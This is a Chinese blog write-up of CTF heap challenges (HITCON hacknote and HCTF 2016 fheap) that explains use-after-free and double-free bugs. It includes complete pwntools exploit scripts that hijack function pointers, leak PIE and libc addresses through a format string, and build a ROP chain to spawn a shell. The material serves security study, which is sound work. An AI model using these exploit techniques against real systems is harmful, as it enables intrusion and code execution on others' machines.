Using After Free

已于 2023-03-20 21:13:48 修改
阅读量122 收藏
点赞数
文章标签: 链表 安全 网络 linux
于 2023-03-20 19:44:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69107736/article/details/129674469
版权

Using-After-Free

总之就是free后没有将指针置为null造成的,我们一般称被释放后没有被设置为 NULL 的内存指针为 dangling pointer。

HITCON-training lib10

题目链接:https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/heap/use_after_free/hitcon-training-hacknote

在这里插入图片描述

题目可以最多创建5个note,会放在全局变量notelist里(00x804A070)

struct note{
    void (*put)(void*);
    char *content;
}

unsigned int del_note()
{
  int v1; // [esp+4h] [ebp-14h]
  char buf[4]; // [esp+8h] [ebp-10h] BYREF
  unsigned int v3; // [esp+Ch] [ebp-Ch]

  v3 = __readgsdword(0x14u);
  printf("Index :");
  read(0, buf, 4u);
  v1 = atoi(buf);
  if ( v1 < 0 || v1 >= count )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( notelist[v1] )
  {
    free(notelist[v1]->content);
    free(notelist[v1]);
    puts("Success");
  }
  return __readgsdword(0x14u) ^ v3;
}
free后没有将指针置为0

print_note里有

  if ( notelist[v1] )
    notelist[v1]->put(notelist[v1]);

有后门函数magic

如果我们可以控制notelist[v1]->put为magic就可以拿到flag

在 add_note里我们会先malloc note结构体,后面会再申请context的内存,del时会先

free(notelist[v1]->content);
free(notelist[v1]);

我们先

addnote(16, b"aaaa") # add note 0
addnote(16, b"ddaa") # add note 1

第一次malloc

在这里插入图片描述

第二次

在这里插入图片描述

依次malloc,堆的是这样的

在这里插入图片描述

我们去free

在这里插入图片描述

tchche bin

Tcache机制是在libc-2.26中引入,小于0x400的堆,FILO(先进后出)的单循环链表、精确分配(不切割)、free后为防止合并后一个堆块的inuse位不置0,大小低于0x400字节的堆块时会首先放入Tcachebin,每个bins最多存放7个chunk,malloc在申请大小低于0x400的堆块时

再次申请

addnote(8, p32(magic))

这里都需要0x10大小的chunk,刚好有两个

这样我们修改note3的context内容也就修改了note1的put指针

在这里插入图片描述

在这里插入图片描述

EXP

from pwn import *

r = process('./hacknote')


def addnote(size, content):
    r.recvuntil(b":")
    r.sendline(b"1")
    r.recvuntil(b":")
    r.sendline(str(size).encode())
    r.recvuntil(b":")
    r.sendline(content)


def delnote(idx):
    r.recvuntil(b":")
    r.sendline(b"2")
    r.recvuntil(b":")
    r.sendline(str(idx).encode())


def printnote(idx):
    r.recvuntil(b":")
    r.sendline(b"3")
    r.recvuntil(b":")
    r.sendline(str(idx).encode())


gdb.attach(r)
magic = 0x08048986

addnote(16, b"aaaa") # add note 0
addnote(16, b"ddaa") # add note 1
delnote(0) # delete note 0
delnote(1) # delete note 1

addnote(8, p32(magic)) # add note 2

printnote(0) # print note 0

r.interactive()

2016 HCTF fheap

https://github.com/zh-explorer/hctf2016-fheap

grxer@grxer ~/D/c/p/heap> ./pwn-f 
+++++++++++++++++++++++++++
So, let's crash the world
+++++++++++++++++++++++++++
1.create string
2.delete string
3.quit
^C⏎                                                                                                                                             grxer@grxer ~/D/c/p/heap [SIGINT]> checksec pwn-f 
[*] '/home/grxer/Desktop/ctfwiki/pwn/heap/pwn-f'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

功能很简单,再create时会malloc一个结构体,string长度>0xf会再次申请一块内存,<直接存在了结构体里,直接推测出结构体大致

typedef struct String{
    union {
        char *buf;
        char array[16];
    } o;
    int len;
    //这里会填充8字节以满足结构体对齐规则 
    void (*free)(struct String *ptr);
} String;

存在一个结构体数组的全局变量在0x2020C0来存储chunk

struct {
    int inuse;
    String *str;
} Strings[0x10]; 大小为16字节

删除时只是简单free没有null 产生dangling pointer

  if ( v1 >= 0x11 )
    puts("Invalid id");
  if ( *((_QWORD *)&struct_at + 2 * (int)v1 + 1) )
  {
    printf("Are you sure?:");
    read(0, buf, 0x100uLL);
    if ( !strncmp(buf, "yes", 3uLL) )
    {
      (*(void (__fastcall **)(_QWORD))(*((_QWORD *)&struct_at + 2 * (int)v1 + 1) + 24LL))(*((_QWORD *)&struct_at
                                                                                          + 2 * (int)v1
                                                                                          + 1));
      *((_DWORD *)&struct_at + 4 * (int)v1) = 0;
    }
  }

create(10,‘hello’)
create(0x20,‘grxer666666666666666666666666666’)

在这里插入图片描述

using after free

我们先creat 两个string ,这样共申请了2个0x32大小的chunk,再先释放1再释放0会进入tcache bins

tchche bin string0------>string1

这时候我们在申请一块小于0x28大小的chunk(空间复用会导致比原来可以多8个字节,也就是chunk head的prev size)

这样我们的结构体会分到string0地址,context会分到string 1地址,string1地址里的free函数还在里面,而且还在全局结构数组里,可以控制该指针为任意函数

这样我们下次再delete(0)可以把两个chunk再次释放

void __fastcall sub_D6C(void **a1)
{
  free(*a1);
  free(a1);
}

再次申请就又可以和之前一样,再次delete(1)循环利用

在这里插入图片描述

覆盖为call puts,泄露pie基址

payload=b’a’*24+b’\x1a’
create(len(payload),payload)

覆盖为printf,利用格式化字符串漏洞

利用pie基址,泄露libc即可

payload=b’a’*4+b’%15$p’.ljust(20,b’b’)+p64(printf_plt)
create(len(payload),payload)
delete(1)
ru(b’a’*4)
_IO_file_write=int(r(14),16)-45
p(‘_IO_file_write’,_IO_file_write)

覆盖为system

拿到shell

在这里插入图片描述

EXP
from pwn import *
from LibcSearcher import *
context(os='linux',arch='amd64')
pwnfile='./pwn-f'
elf = ELF(pwnfile)
rop = ROP(pwnfile)
if args['REMOTE']:
    io = remote()
else:
    io = process(pwnfile)
r = lambda x: io.recv(x)
ra = lambda: io.recvall()
rl = lambda: io.recvline(keepends=True)
ru = lambda x: io.recvuntil(x, drop=True)
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda x, y: io.sendafter(x, y)
sla = lambda x, y: io.sendlineafter(x, y)
ia = lambda: io.interactive()
c = lambda: io.close()
li = lambda x: log.info(x)
db = lambda x : gdb.attach(io,x)
p =lambda x,y:success(x+'-->'+hex(y))
def create(size,content):
	io.recvuntil(b"3.quit")
	io.send(b"create ")
	io.recvuntil(b"Pls give string size:")
	io.sendline(str(size).encode())
	io.recvuntil(b"str:")
	io.sendline(content)

def delete(idx):
    io.recvuntil(b"3.quit")
    io.send(b"delete")
    io.recvuntil(b"id:")
    io.sendline(str(idx).encode())
    io.recvuntil(b"Are you sure?:")
    io.sendline(b"yes")
db('b *$rebase(0xe93)')
create(5,b'hello')
create(5,b'grxer')

delete(1)
delete(0)

payload=b'a'*24+b'\x1a'
create(len(payload),payload)

delete(1)
ru(b'a'*24)
pie=u64(r(6).ljust(8,b'\x00'))-0xD1A
# s(b'quit ')
p('pie',pie)
printf_plt=pie+elf.plt['printf']

delete(0)
payload=b'a'*4+b'%22$p'.ljust(20,b'b')+p64(printf_plt)
create(len(payload),payload)
delete(1)
ru(b'a'*4)
_IO_2_1_stdout_=int(r(14),16)
p('_IO_2_1_stdout_',_IO_2_1_stdout_)
libc=LibcSearcher('_IO_2_1_stdout_',_IO_2_1_stdout_)
base=_IO_2_1_stdout_-libc.dump('_IO_2_1_stdout_')
p('base',base)
system=base+libc.dump('system')

delete(0)
payload=b'sh;'.ljust(24,b'1')+p64(system)
create(len(payload),payload)
delete(1)

io.interactive()

前面这种方法不知道为什么在高版本glibc下拿不到shell,这里我们再delete是发现会在栈上输入,这样我也可以构造rop链来拿到shell

在这里插入图片描述

我们需要输入yes占8个字节绕过strncmp,然后四个pop到后面ret的地址,进行rop
在这里插入图片描述

exp
from pwn import *
from LibcSearcher import *
context(os='linux',arch='amd64')
pwnfile='./pwn-f'
elf = ELF(pwnfile)
rop = ROP(pwnfile)
if args['REMOTE']:
    io = remote()
else:
    io = process(pwnfile)
r = lambda x: io.recv(x)
ra = lambda: io.recvall()
rl = lambda: io.recvline(keepends=True)
ru = lambda x: io.recvuntil(x, drop=True)
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda x, y: io.sendafter(x, y)
sla = lambda x, y: io.sendlineafter(x, y)
ia = lambda: io.interactive()
c = lambda: io.close()
li = lambda x: log.info(x)
db = lambda x : gdb.attach(io,x)
p =lambda x,y:success(x+'-->'+hex(y))
def create(size,content):
	io.recvuntil(b"3.quit")
	io.send(b"create ")
	io.recvuntil(b"Pls give string size:")
	io.sendline(str(size).encode())
	io.recvuntil(b"str:")
	io.sendline(content)

def delete(idx):
    io.recvuntil(b"3.quit")
    io.send(b"delete")
    io.recvuntil(b"id:")
    io.sendline(str(idx).encode())
    io.recvuntil(b"Are you sure?:")
    io.sendline(b"yes")
db('b *$rebase(0xe93)')
create(5,b'hello')
create(5,b'grxer')

delete(1)
delete(0)

payload=b'a'*24+b'\x1a'
create(len(payload),payload)

delete(1)
ru(b'a'*24)
pie=u64(r(6).ljust(8,b'\x00'))-0xD1A
# s(b'quit ')
p('pie',pie)
printf_plt=pie+elf.plt['printf']

delete(0)
payload=b'a'*4+b'%15$p'.ljust(20,b'b')+p64(printf_plt)
create(len(payload),payload)
delete(1)
ru(b'a'*4)
_IO_file_write=int(r(14),16)-45
p('_IO_file_write',_IO_file_write)
libc=LibcSearcher('_IO_file_write',_IO_file_write)
base=_IO_file_write-libc.dump('_IO_file_write')
p('base',base)
system=base+libc.dump('system')
bin_sh=base+libc.dump('str_bin_sh')
pop4=pie+0x00000000000011dc
rdi=0x00000000000011e3+pie
p('bin_sh',bin_sh)
delete(0)
payload=b'a'*24+p64(pop4)
create(len(payload),payload)

sla("3.quit\n","delete ")
sla("delete\nid:","1")
payload= b"yesaaaaa" + p64(rdi) + p64(bin_sh) + p64(0x949+pie)+p64(system)
sla("sure?:",payload)
io.interactive()

double free

我们还可以利用都变了free来做free函数调用hook

如果我们先申请两个string chunk

create(5,b’hello’)
create(5,b’grxer’)

再释放

delete(0)
delete(1)
delete(0)

这样我们的fastbin会在0和1直接有一个回环链表

在这里插入图片描述

我们再次

create(4, b’fsf’)
create(0x20, b’a’ * 0x16 + b’lo’ + b’\x2d\x00’)

第一个create会申请到第一个string堆块,第二个creat会申请到第二个string堆块,和第一个string堆块作为context存储区,而我们的第一个creat会把该块当作自己的struct,这样就可以控制它的free指针,改写为puts指针输出puts地址,找到基址
在这里插入图片描述

我们再次delete(1),再次申请一个context大于0xf<=0x28的chunk即可循环利用

exp 这里只泄露和循环利用,配合前面的两种思路的任何一种都可以
from pwn import *
from LibcSearcher import *
context(os='linux',arch='amd64')
pwnfile='./pwn-f'
elf = ELF(pwnfile)
rop = ROP(pwnfile)
if args['REMOTE']:
    io = remote()
else:
    io = process(pwnfile)
r = lambda x: io.recv(x)
ra = lambda: io.recvall()
rl = lambda: io.recvline(keepends=True)
ru = lambda x: io.recvuntil(x, drop=True)
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda x, y: io.sendafter(x, y)
sla = lambda x, y: io.sendlineafter(x, y)
ia = lambda: io.interactive()
c = lambda: io.close()
li = lambda x: log.info(x)
db = lambda x : gdb.attach(io,x)
p =lambda x,y:success(x+'-->'+hex(y))
def create(size,content):
	io.recvuntil(b"3.quit")
	io.send(b"create ")
	io.recvuntil(b"Pls give string size:")
	io.sendline(str(size).encode())
	io.recvuntil(b"str:")
	io.sendline(content)

def delete(idx):
    io.recvuntil(b"3.quit\n")
    io.send(b"delete ")
    io.recvuntil(b"id:")
    io.sendline(str(idx).encode())
    io.recvuntil(b"Are you sure?:")
    io.sendline(b"yes")
db('b *$rebase(0xe93)')
create(5,b'hello')
create(5,b'grxer')

delete(0)
delete(1)
delete(0)

create(4, b'fsf')
create(0x20, b'a' * 0x16 + b'lo' + b'\x2d\x00')
delete(0)
delete(1)
create(0x20, b'b' * 0x16 + b'lo' + b'\x2d\x00')
delete(0)
io.interactive()
Grxer
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
hacknote--PWN的堆入门
Jason_ZhouYetao的博客
02-24 1201
第一步还是进行逆向的功能分析,顺便观察有无敏感函数,诸如:/bin/sh、cat flag等等   看了看发现还真的有,那这个题目就大大得简化了,接下来进行进一步的逆向分析:   add_note: unsigned int add_note() { _DWORD *v0; // ebx signed int i; // [esp+Ch] [ebp-1Ch] int siz...
HCTF 2016 fheap
Bill
03-11 2058
HCTF 2016 fheap 一. 源码 fheap.c 二. 题目分析 1. 程序的生成 假设我们的源码文件名叫做fheap.c gcc fheap.c -pie -fpic -o fheap strip fheap 其中-fpic是辅助-pie, 没有-fpic将会编译失败. strip是去除符号表(Discard symbols from obje...
hctf2016 fheap学习(FlappyPig队伍的解法)
weixin_30498807的博客
12-10 148
目录 漏洞原理 二次释放 如何在第二次释放前修改函数地址 fastbin的特性 修改函数指针流程 如何获得进程的加载基址 格式化字符串漏洞 确定printf函数在代码段中偏移 printf函数输出想要的地址 如何获得system函数的地址 寻找一个被fheap...
堆利用(uaf)
2302_79813730的博客
03-08 937
use after free,释放后使用UAF漏洞全称为use after free ,即利用已经被free掉的堆块被再次利用,该漏洞的存在是因为程序编写者在free堆块部分没有将该堆块的fd指针改为0,进而导致该堆块可以被申请回来,那么被free的堆块有下面三种情况:1. 堆块free后,其对应指针被设置为NULL,即再次被调用该堆块时就会发生错误;2.堆块free后,对应指针没有被设置为NULL,即还可以调用会该堆块,当我们申请一个比该堆块小于等于的size时。
hctf2016[pwn]-fheap
CharlesGodX的博客
03-30 1588
0x00:前言 这道题是一道堆栈混合加格式化字符串的题目,题目的利用点不错,很适合好好做一遍。 0x01:题目链接 https://github.com/zh-explorer/hctf2016-fheap 0x02:解题思路 首先查看程序保护 root@Thunder_J-virtual-machine:~/桌面# checksec pwn-f [*] Checking for new vers...
Loop-free routing using diffusing computations
05-04
loop-free at every instan~ and to outperform all other loop-free routing algorithms previously proposed from the standpoint of the combined temporal, message, and storage complexities.
xcpclock_demo.zip_Free!_clock_desktop_my clock
09-23
After finishing my XAnalogClock article, I wanted free-floating clock to use on my desktop. XCPClock is implemented using SetLayeredWindowAttributes, which is available in Win 2000 and later.
Predictive.Analytics.using.Rattle.and.Qlik.Sense
07-13
Qlik Sense Desktop, the personal and free version of Qlik Sense, is a powerful tool for business analysts to analyze data and create useful data applications. Rattle, developed in R, is a GUI used for...
Automatic local exposure correction using bright channel prior for under-exposed images
02-09
A well-exposed noise-free image is then recovered after exposure correction followed by non-uniform denoising and detail enhancement. Our experiments on under-exposed images of various scenes ...
free】Deep Learning for Computer Vision with Python.zip
06-22
You should also feel relatively comfortable using the Keras library and the Python programming language to train your own custom deep learning networks. The purpose of the Practitioner Bundle is to ...
2016 hctf fheap 题解
abc380620175的博客
03-27 520
题目链接 https://github.com/zh-explorer/hctf2016-fheap 题目分析 题目功能只有 malloc 和 free 的功能,查看堆的布局: 全局指针没有置空,导致 uaf 和 double free 漏洞,两种都可以做,但是这题的重点是绕过 PIE。 double free 完了之后,会导致下面的情况 这里需要注意一下 create 函数的...
hctf2016-fheap
热门推荐
钞sir的博客
03-28 1万+
题目地址:https://github.com/zh-explorer/hctf2016-fheap 程序简介 程序中只有3个功能,一个create,一个delete然后一个quit: +++++++++++++++++++++++++++ So, let's crash the world +++++++++++++++++++++++++++ 1.create string 2.delete ...
2016 HCTF fheap writeup
SkYe's Blog
09-13 310
基本情况 Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 基本功能 阉割版堆管理器,有增删功能。 // 管理堆的结构体 struct { int inuse; String *str; } Strings[0x10]; // 堆结构体 typedef struct String { union {
hctf 2016 write up
Shinpachi8的博客
11-27 3484
今年的hctf与几个哥们儿一起组队玩了一下。但是成绩比较惨淡。 但是还是把自己的writeup 写一下。 以做纪念。
2016hctf writeup
Aurora的博客
03-04 3231
MISC杂项签到 http://139.224.54.27/webco1a/+_+.pcapng 用wireshark打开流量包,追踪TCP流,发现是一个webshell的流量,看到webshell控制端查看了远程服务器上的两个关键文件:function.py和flag cat function.py: #!/usr/bin/env python # coding:utf-8 __au
pwn 堆溢出之 泄露基址
qq_41071646的博客
04-25 2861
先声明一下本文的参考链接 https://blog.csdn.net/weixin_34050005/article/details/86881709?tdsourcetag=s_pctim_aiomsg 这篇博客写的非常好 受教了 本来其实我是看的另一道题 但是那道题 感觉并不是很适合我这种萌新 然后我就看到了这道题 就 由于这个篇文章写的很清楚 而且 代码直接就可以拿到f...
[BUUCTF]PWN——inndy_echo2(PIE+64位fmt)
mcmuyanga的博客
02-01 1480
inndy_echo2 附件 步骤 例行检查,64位程序,开启了nx和pie 本地试运行一下,看看大概的情况,猜测跟echo差不多。 64位ida载入,跟32位echo一样的代码,只是多开了一个PIE 64位的格式化字符串漏洞,它跟32位有挺大区别的,要注意‘00’的截断,不可以像32位那样一步修改到位,它一次只可修改2字节。不清楚的先看这篇文章 首先对于PIE,我们要先想办法泄露程序基址 在执行echo函数时,echo的栈帧的上一个元素存储了函数的返回地址,返回到main中,所以栈中必定有返回地址
PWN基础入门教程
qq_39153421的博客
07-26 1355
Linux pwn入门教程(0)——环境配置链接:https://mp.weixin.qq.com/s?__biz=MzAwMTUyMjQ5OA==&mid=2650967081&idx=1&sn=454206a8b291871dacbcbb72ed36357d&chksm=812e4204b659cb124d9e54a97818b1...
数字时代网络安全即服务的兴起
最新发布
网络研究观
06-11 540
网络安全即服务是一种通过基于云的服务来管理安全需求的综合方法。
Error while waiting for device: Timed out after 300seconds waiting for emulator to come online.
03-31
4. Use a different emulator image: If the issue persists, try using a different emulator image or version to see if that resolves the problem. 5. Increase the timeout value: If none of the above ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值